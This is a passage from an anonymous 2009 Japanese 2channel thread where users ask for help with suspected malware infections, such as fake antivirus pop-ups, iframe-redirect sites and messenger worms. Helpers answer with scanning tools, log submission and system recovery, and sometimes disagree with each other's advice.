153:名無しさん@お腹いっぱい。
09/09/19 00:11:44
>>152
エラーで表示されない
154:名無しさん@お腹いっぱい。
09/09/19 00:16:56
>>153
すいません、貼りなおしてみましたが同じですよね。
URLリンク(www.smooche.jp)
155:名無しさん@お腹いっぱい。
09/09/19 00:22:14
www.smooche.jpにアクセスしようとするとavastも怒るね
URLリンク(www.aguse.jp)で調べると
「外部にリダイレクトされています」って警告が出る
156:名無しさん@お腹いっぱい。
09/09/19 00:26:08
>>155
レスありごとうございます。ウィルスでしょうか?
ノートン2009なんですが、リスク名は「 acrobat PDF Suspicious File Downlode3」
と出てました。
157: ◆N9P3SuvBPo
09/09/19 01:04:18
>156
AVG7.5でも反応あり
あとソースを見ようとすると再びAVGが反応するので、ソースチェッカーオンラインというのを使い、
調べて見ますと、IFrameタグで悪質サイトに飛ばせようとします。
またジャンプタグで別サイトを呼びこむ仕掛けもあります。
158:名無しさん@お腹いっぱい。
09/09/19 01:13:17
>>157
レスありがとうございます。それと、ご親切に有難う。詳細が分かりましたら、教えてください。
genoウイルスってやつかな・・・。ノートンで一応「遮断しました」とは出たんですが、大丈夫かな。。
159:八頭 ◆YAGApwSaEw
09/09/19 01:49:00
>>158
シマへ報告しといたからダイジョブ
160:名無しさん@お腹いっぱい。
09/09/19 02:08:44
>>159
有難うございます
161:名無しさん@お腹いっぱい。
09/09/22 20:22:30
URLリンク(ss2music.com)
↑
このページって何かのウィルスが
組み込まれているのでしょうか?
162:名無しさん@お腹いっぱい。
09/09/22 20:32:34
うん
163:名無しさん@お腹いっぱい。
09/09/23 00:19:37
【使用OS】 Windows XP
【Microsoft Update(MU)の状態】 多分手動
【使用セキュリティソフトとバージョン】 ウィルスセキュリティZERO
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 自動更新なので多分
【スパイウェア対策ソフト】 同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】 同上
【ルータの有無】 多分ある
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャン中
友人からMSNメッセンジャーで送りつけられた変なURLを踏んでしまい、
自分もメッセンジャー経由で他人にURLをばら撒くようになってしまいました。
自分がばら撒いたことは自分ではわかりません。
その時のメッセージは
-------------------------------------------
○○の発言 :
Obama http://オバマwebcam.com/
-------------------------------------------
(オバマ → obama)
といったものだったと思います。
このURLでググっても日本語サイトが出てこないため、対策がわかりません。
どなたか、よろしくお願いします。
164:名無しさん@お腹いっぱい。
09/09/23 16:08:03
クリーンインストール
165:名無しさん@お腹いっぱい。
09/09/24 02:01:21
PC初心者です。携帯から失礼します
【使用OS】 WindowsVista
【症状】 tora3aux.exeが認証を求めています。の表示が下の黒いバーに出てる。
ファイルは怖くて開いてないんで、被害は無く、自動アップデートには失敗してくれるんで大丈夫なんですが、トロイですよね?
消したいんですが、どうすればいいんでしょうか?
166:名無しさん@お腹いっぱい。
09/09/24 04:03:47
Windows,vistaで画面の下にある黒いバーの部分に「tora3aux,exeがアクセス許可を求... - Yahoo!知恵袋
167:名無しさん@お腹いっぱい。
09/09/24 10:29:58
>>165
携帯から失礼します。
釣りなんだろ?
168:名無しさん@お腹いっぱい。
09/10/05 00:45:54
URLリンク(www.amigo.in)
これは何?
検査しても何も出てこないんだが平気?
169:名無しさん@お腹いっぱい。
09/10/05 01:25:04
URLリンク(futabakikaku.com)
↑
これウイルス仕込まれてたページみたいなんだけど、
踏んだとき404エラーになっててもウイルスって感染するのかな?
170:名無しさん@お腹いっぱい。
09/10/05 01:45:11
>>168
いわゆるブラクラ。 大量にFLASH再生が立ち上がってPCの動作がおかしくなる。(ウイルスは仕込まれて無いっぽい。)
とりあえずGoogle SafeBrowsingに攻撃サイトとして報告しておいた。
>>169
普通は感染しない。(そのページは現在本当に404)
ただし、ちょっと前に、404のページに見せかけて裏で隠して攻撃コード仕込むサイトがMDLに載っていたので、
404に見えるからって安心できない。
# こういう心理の落とし穴を使うタイプ(表示が404だから裏で起きていることを警戒しないタイプ)は凄いタチ悪いと思う...orz
171:名無しさん@お腹いっぱい。
09/10/05 01:53:42
>>170
ご回答ありがとうございます。
(そのページは現在本当に404)とありますが、
=感染していない、という捉え方で宜しいですか?
重ね重ねすみません。。
172:名無しさん@お腹いっぱい。
09/10/05 02:04:31
>>171
とりあえず、私が見た時点(1:40頃)は何もなかった。ので、私とそれ程変わらない時間に見たんなら
大丈夫(感染してない)だと思う。
まあ、こういうのって心配しはじめるとキリが無いんだけどね。(w 心配ならシマンテックとかマカフィー,
カスペルスキーとかのオンラインスキャンをやっておけばいいと思う。
※ 自分が使っていないソフト会社のオンラインスキャンをするのが良い。
173:名無しさん@お腹いっぱい。
09/10/05 02:08:27
>>172
configとか書いてるのに本当に手が滑って押しちゃって・・・。
ありがとうございましたー。
174:名無しさん@お腹いっぱい。
09/10/05 02:18:14
私もURLリンク(www.amigo.in) 踏んじゃいました・・・
一瞬表示されてすぐに消したんだけど・・・
今のところPCは動いてるんだけど、兄のPCなんで壊したら叱られちゃう
175:初心者
09/10/05 19:22:47
【使用OS】 「SP3」
【Microsoft Update(MU)の状態】 「on」
【使用セキュリティソフトとバージョン】 「AVG8.5420」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「SuperAntiSpyware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トロイなんたら。
パニくって反射的に削除してしまいました。
再スキャンしたら、大丈夫でした。
ニフティのオンラインスキャンしたら、ウィルスを一つ検出しました。
用心のために、リカバリしたほうがいいでしょうか?
気がつかないでショッピングサイトにログイン
(退会するためでしたが)したのが怖いです。
マイドキュメントのファイル、読まれてしまったかな・・・。
176:175
09/10/05 19:25:40
すいません、常時AVGを使っていて、
ニフティのオンラインスキャンしたらいつ出たってことです。
AVGのバカ。
177:175
09/10/05 19:26:58
ニフティのオンラインスキャンは、カスペルスキーです。
パニ食っててすいません。
178:名無しさん@お腹いっぱい。
09/10/05 19:34:20
>>177
大丈夫かなと思ってそのまま使い続けても、不安は完全には拭い切れないでそ?
ならリカバリしたほうが精神衛生的にもイイと思う
それで改めてアンチウイルスソフトの選定すればいいかなと
179:175
09/10/05 19:50:23
>>178
そうですね、
どうもありがとうございました!
180:名無しさん@お腹いっぱい。
09/10/06 23:13:20
【使用OS】XP
【Microsoft Update(MU)の状態】手動
【使用セキュリティソフトとバージョン】ノートン
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】いいえ
【スパイウェア対策ソフト】ad-aware spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】わかりません
スキャンした結果、トロイの木馬が3つ見つかり、削除済みです。
しかしURLリンク(188.165.18.19)
が頻繁に勝手に開かれるという症状は改善されません。
alertfindやcanfind等のサイトも勝手に開かれているみたいです。
ネット等で調べましたが、対処方法がわかりません。
よろしくお願いします。
181:名無しさん@お腹いっぱい。
09/10/06 23:25:33
mixiのウイルスって未だに活動してんの?
さっきいつもどおりにログインしようとしたらカスペさんが「やばいっすよ」と教えてくれた
まさか新種じゃないよね?
182:八頭 ◆YAGApwSaEw
09/10/06 23:27:37
>>180
●IPA 情報処理推進機構
「 USB メモリのセキュリティ対策を意識していますか? 」 Windowsの自動実行(オートラン)機能を無効にする
※USBメモリの使用に関わらず設定しておくこと!
URLリンク(www.ipa.go.jp)
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.txt」がメモ帳で開いて、デスクトップ上にテキストで自動的に保存されています
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
183:八頭 ◆YAGApwSaEw
09/10/06 23:30:53
Windowsの自動実行(オートラン)機能を無効にする した後、一度PC再起動
【スパイウェア対策ソフト】ad-aware spybot ← 2つとも保護機能をすべて解除してからアンインストールしておいて下さい
つづき
OTLとRootRepealのログを新規フォルダへコピー貼り付け移動して、フォルダを圧縮
圧縮フォルダ名を[ Report ] - Infection log reportとして以下へ提出
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
184:名無しさん@お腹いっぱい。
09/10/06 23:31:13
>>181
うちのカスぺさんも「やばいっすよ」と教えてくれた
友人のバスターは無反応らしい
185:170
09/10/06 23:54:49
>>168
ども。 oppai.htmlをaviraに判定依頼送ったら、JS/BrowserCrasher.A. (新種)って返事が来た。
って、検出名そのまんまかよ。(w
# まだVDFには反映されてません。 なんで、Virustotalは0/41のままです。 Avira一番乗りかな?
>>174
先日の時は、別にウイルスに感染する訳じゃなかったようなので、再起動して問題なければ大丈夫かと。
ただ、こういうブラウザの制御が効かなくなるヤツは、裏で新種マルウェアが組み込まれると厄介だから、お互い気をつけましょう。
ちなみに、googleの方はまだ対応してませんね。 amigo.inのサイトは生きているから、注意お願いします。
(googleは再送してみます。)
186:名無しさん@お腹いっぱい。
09/10/07 16:59:21
フリーソフトを入れるとPC壊れるって書いてるやつがwww
こんなこと本気で思ってんのかこいつwww
それにしても頓珍漢な回答するやつも多いなwww
URLリンク(oshiete.filesend.to)
187: ◆N9P3SuvBPo
09/10/07 21:36:18
>186
専門家と名乗ってる人ですよね。
フリーソフトがuser.dllだか、kernel32.dllを削除したせいで、OSが壊れてしまった…と。
普通、専門家の方なら誤検出を予測するでしょう。
188:名無しさん@お腹いっぱい。
09/10/07 22:18:09
メールがたくさん送りつけられるウィルスって何なのでしょうか?
189:名無しさん@お腹いっぱい。
09/10/07 23:36:03
2009/10/07 22:35:17
スタートアップ検査
システムメモリに入り込んだ
Win32/Olmarik
トロイの木馬を
駆除できません
くぐっても情報が無いので分かる方
教えを下さい
190:八頭 ◆YAGApwSaEw
09/10/07 23:46:47
>>189
これだけ教えてくれるかな
【使用OS】 『』 例、Vista sp3 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
191:名無しさん@お腹いっぱい。
09/10/07 23:55:23
【使用OS】 『Microsoft Windows XP Home Edition』
【使用ブラウザ】『OperaTor』
【Microsoft Updateの更新の状態】『自動更新設定』
【セキュリティソフトと年式】『ESET NOD32 Antivirus』
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』
【回線の種類・ルータの有無】『ADSL回線』
CPU名 Intel(R) Pentium(R) M processor 1.60GHz
物理メモリ空き容量 32 MB
ページファイル空き容量 614 MB
仮想メモリ空き容量 1997 MB
192:八頭 ◆YAGApwSaEw
09/10/08 00:02:48
【セキュリティソフトと年式】『ESET NOD32 Antivirus』 → アンインストールしてNIS2010体験版に入れ替える
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』 → 保護機能を解除してからアンインストール
ノートンシリーズの体験版 (*30日間すべての機能を利用できます)
URLリンク(www.symantecstore.jp)
Spybotの代わりに「a-squared Free 4.5」と「Avira AntiVir Personal 8」 を導入する
スレリンク(sec板:8番)
193:名無しさん@お腹いっぱい。
09/10/08 00:13:20
低スペックにノートンはきついので
Spybotの代わりに「a-squared Free 4.5で検査してきます
有り難う御座いました。
194:八頭 ◆YAGApwSaEw
09/10/08 00:22:17
a-squared Free 4.5が一番重いよw
195: ◆N9P3SuvBPo
09/10/08 02:02:14
>189
リカバリしましょう。
ついでに192は根本的に間違ってますのでしないように。
192は常駐型アンチウイルスの同居を奨めています!
本気で助けたいと思うのなら、既存のセキュリティソフトを消せとか言いませんよ、普通は!
196:八頭 ◆YAGApwSaEw
09/10/08 02:39:47
>>◆N9P3SuvBPo
>システムメモリに入り込んだ とあるからね
悪党はリカバリ退避まで見越しているんじゃないの?
スレリンク(sec板:8番)
それから、ここのはすべて組み合わせてウチで併用確認済みだよ
197:八頭 ◆YAGApwSaEw
09/10/08 02:45:57
>>◆N9P3SuvBPo
URLリンク(i.imagehost.org)
198:名無しさん@お腹いっぱい。
09/10/08 12:21:13
★質問用テンプレ★
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「スパイボット」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「していない」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
『ノートンがHDDの\Windows\temp\_ex08.exeにpacked Genericを検出し遮断してすぐ覚えのないセキュリティソフトが起動したので回線を切って再起動したところ
またそのセキュリティソフトが起動し下のリンクの携帯でとったスクリーンショットのようにウイルスがあるとのこと。
そのソフトが。右下にIE、FireFox、Outlookからパスワードをとるウイルスをみつけた的なことを英語で言う
タスクマネージャで12038418.exeが何かしていると思いよくみたら、HDDのC\Document and setting\all users\Application Data\12038418のフォルダにあり、
上記のよくわからないセキュリティソフトのアイコンでした』
【その他】 『Yahoo!ニュースでパスワードを持っていくウイルスが活躍中なのをみかけました』
【スクリーンショット】
URLリンク(i.imagehost.org)
どうするのがよいでしょうか
スクショのセキュリティソフトは信用していいのでしょうか?
199:名無しさん@お腹いっぱい。
09/10/08 13:34:31
>>198
スレリンク(sec板)l82から183を嫁
200:名無しさん@お腹いっぱい。
09/10/08 15:11:19
>>199ありがとうございます。
シマンテックに提出したところ、
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: [ Report ] - Infection log report.zip
machine: Machine
result: See the developer notes
filename: 12038418.exe
machine: Machine
result: This file is detected as Suspicious.S.MLApp.
filename: 12038418.cfg
machine: Machine
result: See the developer notes
Customer notes:
Developer notes:
[ Report ] - Infection log report.zip is a container file of type ZIP
12038418.exe reserves one slot in Tier 1 for future malicious behavior category This file is contained by [ Report ] - Infection log report.zip
12038418.cfg Our automation was unable to identify any malicious content in this submission.
The file will be stored for further human analysis This file is contained by [ Report ] - Infection log report.zip
Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.
とメールがきたのですがこれはどういう意味でしょうか・・・?
201:名無しさん@お腹いっぱい。
09/10/08 15:20:16
英語で帰ってくんのかよ
202:名無しさん@お腹いっぱい。
09/10/08 17:36:01
専門用語とかはいってたらお手上げだよなぁ・・・
203:八頭 ◆YAGApwSaEw
09/10/08 20:53:30
>>200
ログと該当exeを提出したの?
LiveUpdateを行い、システムの完全スキャンをしてみるといいよ
【スパイウェア対策ソフト】 「スパイボット」 ← 役立たず
204:名無しさん@お腹いっぱい。
09/10/08 21:34:05
>>203ログはしてないです。最初に自動実行やめて再起動してしまったのでよくわからないけどログはのこってないのかとおもって・・・
205:八頭 ◆YAGApwSaEw
09/10/08 22:07:04
他にも感染があったかもしれないからログで診てもらえばよかったのに・・・
Nortonスレのテンプレも読んどいてね
206: ◆N9P3SuvBPo
09/10/09 00:26:04
>196
a-squared Free 4.5はともかく
Avira AntiVir Personal 9と併用しても問題ないと。
207:名無しさん@お腹いっぱい。
09/10/09 01:36:02
>>205いまからやってもおそいですか?
208: ◆N9P3SuvBPo
09/10/09 01:44:34
>>207
>>198ですよね?
間違い無くウイルスなのでリカバリしたほうが早いですよ。
209:198
09/10/09 03:35:07
>>208やっぱりリカバリですか・・・
12038418.exeをスタートアップから外したら見た目は問題なくなったんですけどやっぱりまだなにかあるかもしれないですよね
でも家族で共用のPCなので、自分以外が使ったときに今までと違うことがあったら対処できるのかもしんぱいです。
しかし仕事のファイルも作成したりすることがあるのでリカバリかなぁ・・・・
210:名無しさん@お腹いっぱい。
09/10/09 07:13:37
>>209
なおさらリカバリしなきゃダメです
211:名無しさん@お腹いっぱい。
09/10/09 16:50:41
>>209
もういないかな?
私も海外サイトを見ていたら、>>198と同じソフトが突然起動しはじめました。
ノートンでスキャンを実行すると「W32.Waledac」が検出されて削除。
この偽ソフト自体はセーフモードで削除しました。
偽ソフトの画像で検索すると↓下記の記事を見つけたけど、exeの名前とか微妙に違う。。
URLリンク(www.411-spyware.com)
連休はリカバリするか・・・
212:名無しさん@お腹いっぱい。
09/10/09 17:51:33
>>211
感染の心当たりはありますか?
213:名無しさん@お腹いっぱい。
09/10/09 18:56:27
>>212
海外のブログの広告を間違えてクリックしたら
エラー画面が出てPCがゴゴゴーと動きだしました
214:名無しさん@お腹いっぱい。
09/10/09 21:01:08
>>211こちらはノートン2010で完全スキャンかけてもなにもなかったんですけどねぇ
exeファイルのみをスキャンしてみても異常なしでした
いまから購入時の状態に戻します
ちなみに自分は中華サイトみてたら壁紙が灰色になってウイルス発見!って・・・
スタートアップやデスクトップにショートカットまでつくるなんてやるなぁ
信用してたらどうなってたのか怖い怖い
215:名無しさん@お腹いっぱい。
09/10/09 21:06:51
>>213
ありが㌧
216:214
09/10/09 21:09:56
ってよく読んだら偽のウイルスセキュリティソフトを購入させる気だったんですね
情報持って行くタイプでなかったからまだよかったけど、exe起動させられたからオルタナティブとかも起動させられたりできそうだな・・・
217:名無しさん@お腹いっぱい。
09/10/10 22:31:15
他の掲示板でも質問させてもらったですが、至急回答が欲しいのでこちらでも失礼します。
ウィルスなのかわからないのですが、
深夜2時に自動でPCが起動してしまって、音楽といーっひひとずっと子供の笑い声が響きます。
怖くなってしまい、すぐ電源を落としてしまったのですが、
一体原因は何なのでしょうか
218: ◆N9P3SuvBPo
09/10/10 22:52:41
「マルチ」というわけですね。
219:名無しさん@お腹いっぱい。
09/10/10 23:24:25
>>218
はい、申し訳ないですがその通りです。
何かご存じでしたら、教えてもらえないかと思います。
220:名無しさん@お腹いっぱい。
09/10/11 09:54:30
>>217
電源の切れたPCを勝手に立ち上げるマルウェア(ウイルス)は聞いたことがないが...
電源が入るのは、単に、BIOSの設定で Wake on LAN とか Wake on Ring みたいな
Wake on ~がONになっていて、それが動作しただけの気がする。
音楽と子供の笑い声は、実際どんなモンが再生されたのか不明なんで何とも。
(聞いたことある音楽なのか、心当たりのない音楽なのかで判断違うし)
気になるなら、まずはシマンテック,マカフィー,カスペあたりのオンラインスキャンを
やってみれば良いと思うよん。
221:八頭 ◆YAGApwSaEw
09/10/11 11:56:05
>>217
Bad Joke系は何故かAntiVirが強い
Avira AntiVir Personal (無料版)
URLリンク(www.free-av.com)
設定ポイント
URLリンク(i.imagehost.org)
222:名無しさん@お腹いっぱい。
09/10/12 00:20:25
【使用OS】 「windowsvista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「ADSL回線」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「毎日検索しているのですが、
毎回cookie_Doubliclickとcookie_overtureと言うものが検出されます、
削除しましたと出てきますが、検索したらほぼ毎回検出されます、これはウィルスなのでしょうか?
初心者で大変申し訳ないのですが、よろしくお願い致します」
223:名無しさん@お腹いっぱい。
09/10/12 00:32:27
cookie_Doubliclickとcookie_overtureを
グーグル検索すれば解決するんじゃないかな
224:名無しさん@お腹いっぱい。
09/10/12 00:41:36
>>223
ありがとうございます!
お手数おかけしてすみませんでした・・・。
225:名無しさん@お腹いっぱい。
09/10/12 23:58:55
<div style="display:none">iaadaacxfsvljiejsvakfhwmadlrwbo</div>というように
謎の31文字が埋め込まれるiframe型の改竄って、まとめて検出名ついていますか?
226:225
09/10/13 18:36:03
あくまでも不正サイトから何をダウンロードするか、であって、
改竄されているページに対しての名称はないみたいですね。。。
227:名無しさん@お腹いっぱい。
09/10/15 04:47:54
パソコンの右クリックが全く出来なくなってしまいました…
たぶんFLASHのゲームやったからなったとおもうんですけど……
インターネットの線は抜いたんですけど共有ルーター使ってるんでとても不安です
フォーマットしたほうがいいでしょうか?
228:名無しさん@お腹いっぱい。
09/10/15 04:55:42
↑左クリックでしたm(__)m
右クリックでメニューは出来ますが開けません…
229:名無しさん@お腹いっぱい。
09/10/15 14:58:22
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
230:名無しさん@お腹いっぱい。
09/10/19 14:28:49
きちんと対策を行ったつもりなのですが、心配なので質問させて下さい。
【os】windows xp
【アップデートの状態】最新
【セキュリティソフト】ウィルスセキュリティゼロ/最新の状態(更新も頻繁に行っています)
【ルータの有無】有
ウィルスセキュリティにてスキャン中、「in the backdoor」と表示され、
怖くなって詳細を確認したところ、ファイル名「jword2.exe」と表示されました。
隔離されたのですが、心配なので削除を行い、
ノートンのオンラインスキャン→ウィルス検出されず
後、ウィルスセキュリティにて再度スキャン→検出されず
というような結果でした。ウィルスは完全に抹消されたと思っていいのでしょうか?
初心者ゆえ拙い文章ですみません。よろしくお願いします。
231:名無しさん@お腹いっぱい。
09/10/19 19:25:21
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2010」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「総合検索は初期状態の一ヶ月に1回程度」
【ルータの有無】ADSL回線 モデムは富士通W4
検索をかけたらサミー777からウィルスが2個出てきた。
結局削除する羽目になったが駆除できなかった
これはサミーに問い合わせたほうがいいのかな
232:八頭 ◆YAGApwSaEw
09/10/19 19:58:35
>>230
PC健康診断掲示板 で診てもらえばいいよ
スレリンク(sec板:5番)
>>231
サミー777について詳しく
連絡は信頼出来る第三者を介したほうがいいかも
スレリンク(sec板:6番)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
233: ◆N9P3SuvBPo
09/10/19 21:19:33
>230
jwordというプログラムがインストールされてませんか?
(あの人はただ不安を煽ってるだけなので)
234:名無しさん@お腹いっぱい。
09/10/19 23:54:38
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー 最新」
【ルータの有無】 「ADSL たまに無線LAN」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「特になし。」
私はパソコン初心者です。どこに相談したら良いか分からず、こちらに相談させていただきます。
もしスレチなら、ベストな板へ誘導して頂けると助かります。
昨日Eメールを開いたら、見慣れないところから怪しいメールが2件。
1000万円の手続きが完了しました、とか、10月無料手続き完了。200万円の手続きが完了しました。
とか。
1件は私の名前がフルネームで記載されていて、「○○(私の名前)様!」と。
つまり、名前とパソコンの本アドが漏れているということ。
とても怖いです。
それから、最近気になるのは、2ちゃんなどで書き込みしてて、文章打ってる途中で
勝手に変に変換されたり、変なところで区切れて無変換になったり、カーソルが勝手に
飛んで、打ってる途中で文章が変な所に打ち込みささったり。
私は、ネットウィルスにでも感染して、パソコンがおかしくなっているのでは?
ウィルスが原因で、どこかから情報が漏れたりしているのでは?と不安なのですが、
職場の上司に「ハッキングじゃないの?」
と言われ、どのように対応したら良いか、非常に焦っています。
最近ネットで買い物したり、占いや相談サイトへの無料登録などで、パソコンの本アド
を登録することが多かったので、そういうところから漏れているのでしょうか?
特にウィルス検査でも引っ掛からないのですが・・・。
誰かアドバイスいただけると助かります。
235:名無しさん@お腹いっぱい。
09/10/20 09:34:21
>>230です
>>233
はい。necのパソコンなので、買った当初からインストールされておりました。
Jwordは特に使っている機能でもないので、ウィルスを発見した時点でアンインストールしてしまったのですが…。
236:八頭 ◆YAGApwSaEw
09/10/20 19:16:05
>>234
OTL.exeとRootRepealをデスクトップ上にダウンロードして、
ネットケーブルを抜いてからPCを一度再起動して、ネット非接続のままでログ抽出してみて
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック > ログ抽出走査がスタート
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > ログ抽出走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
237:名無しさん@お腹いっぱい。
09/10/20 23:07:41
パソコン詳しくないので、
初心者のほうへ書き込んだのですが、
アドバイスがもらえそうもないのでこちらへ来ました
タコウィルスにやられました。
リカバリも出来ません。
ハード買い換えるしかないですか?
238:名無しさん@お腹いっぱい。
09/10/21 05:40:30
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
239:234
09/10/21 15:21:15
>>236
レスありがとうございます。諸事情で遅くなりましたが、昨晩OTLを実行してみました。
Drive not Present or media not loaded
という表示でした。英語だからよく分からないのですが、これは問題ない、ということでしょうか?
また、もう一つのRootRepealはダウンロードしようとしましたが、私のパソコンの
セキュリティソフトに引っ掛かり、危険とのこと。実行して良いか迷い、まだ実行してませんが、
やはり実行したほうが良いでしょうか?
240:八頭 ◆YAGApwSaEw
09/10/21 19:39:58
>>234
【使用OS】 「vista」 ← 32bitですか?64bitですか?
support.microsoft.com
コンピュータで実行されている Windows オペレーティング システムが 32 ビット版か 64 ビット版かを確認する方法
URLリンク(support.microsoft.com)
マカフィーはOTLとRootRepealを誤検出して使えないみたいなので、次の内どれかを選んで下さい
1,higaitaisaku.comのPCトラブル質問掲示板で診てもらう
2.Norton体験版+OTL+RootRepealで駆除する
3.マカフィースレで駆除してもらう
241:234
09/10/21 20:01:13
>>240
コントロールパネルで確認したら、32bitでした。
ちなみに、昨日ウィルスバスターのオンラインスキャンも実行してみましたが、
何も検出されませんでした。
1,higaitaisaku.comのPCトラブル質問掲示板
なんてものがあったのですね!そちら覗いてみます。
ありがとうございます。
242:名無しさん@お腹いっぱい。
09/10/21 21:22:40
セーフモードですら立ち上がらず再起動の繰り返しになったらリカバリーしかないですかね?
その場合中のデータは全て無くなってしまうのでしょうか?
243:名無しさん@お腹いっぱい。
09/10/21 21:28:26
通常はそうです
244:名無しさん@お腹いっぱい。
09/10/21 21:34:58
やはりそうですか…。
データ復旧が出来ないのは辛いですね…。店で売ってるような復旧ソフトでも無理ですよね。
245: ◆N9P3SuvBPo
09/10/21 22:10:29
>>244
無駄な足掻きだけど、Windows拡張オプションメニューの項目に
"システム障害時の再起動を無効にする"ってのがありますよね。
それを選んで起動すると、たぶん青色の画面になってそこに英語の文字が出てくると思います。
その表示された英語の文字を教えてくれますか?
246:名無しさん@お腹いっぱい。
09/10/22 00:24:48
ああ付属のシステムリカバリーソフトも紛失したようだ…。
どうしようもないな俺。ちょっと混乱して寝れそうもない。
明日復旧、セキュリティソフト買って無理なら諦めます。
なんか自分の一部が死んだようだ。こんなに自分がPCに依存して生きてたなんて。
ホントに馬鹿だった迂闊だった無防備だった。
似たような環境の友達にも忠告しました。何でもない一日がなんでこんな事に…悪夢だ…。
247: ◆N9P3SuvBPo
09/10/22 00:36:50
>246
リカバリソフトを紛失してもメーカーから取り寄せるっていう手もありますよ。
有料だけど…。
248:名無しさん@お腹いっぱい。
09/10/22 01:32:27
駄目もとで取り寄せてみようか…。
Winnyやマジコンをやってないのを言い訳にしてお情け程度のセキュリティのノーガードで増長してた報いです。
市民プールで我慢しときゃよかったのに泳げないくせに浮輪一つで海で溺れた馬鹿野郎です。
そろそろ落ちついたんで消えます。ありがとう。
249:名無しさん@お腹いっぱい。
09/10/22 09:10:33
パソコンを起動させたら、デスクトップのショートカットアイコンがほとんどなくなっていました。
またメール(ベッキー)やFFFTPなど各種ソフトの設定がなくなっていました。
ファイルデータは残っていたので、良かったのですが・・・
